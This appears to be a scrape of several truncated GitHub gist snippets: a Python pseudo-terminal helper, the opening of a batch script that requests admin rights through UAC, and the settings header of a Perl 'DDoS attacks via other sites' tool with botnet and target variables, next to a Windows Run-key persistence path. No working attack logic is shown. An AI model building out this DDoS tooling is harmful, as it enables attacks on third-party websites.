HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C:\Documents and Settings\Administrator
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import pty | |
import os | |
import select | |
def mkpty(): | |
master1, slave = pty.openpty() | |
slaveName1 = os.ttyname(slave) | |
master2, slave = pty.openpty() | |
slaveName2 = os.ttyname(slave) | |
print("\ndevice names: ", slaveName1, slaveName2) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
:: BatchGotAdmin | |
:————————————- | |
REM –> Check for permissions | |
nul 2>&1 “%SYSTEMROOT%\system32\cacls.exe” “%SYSTEMROOT%\system32\config\system” | |
REM –> If error flag set, we do not have admin. | |
if ‘%errorlevel%’ NEQ ‘0’ ( | |
echo Requesting administrative privileges… | |
goto UACPrompt | |
) else ( goto gotAdmin ) | |
:UACPrompt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
# DDoS attacks via other sites execution tool | |
############################################# | |
# Settings | |
my $version = "1.1.3"; # program version | |
my $agent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; # user agent | |
my $default_port = "80"; # default port of the host | |
my $show_stat = 1; # show statistic of work | |
my $default_site = "http://site"; # default site for attack | |
my $testURL = "http://www.bing.com"; # default site for testing botnet |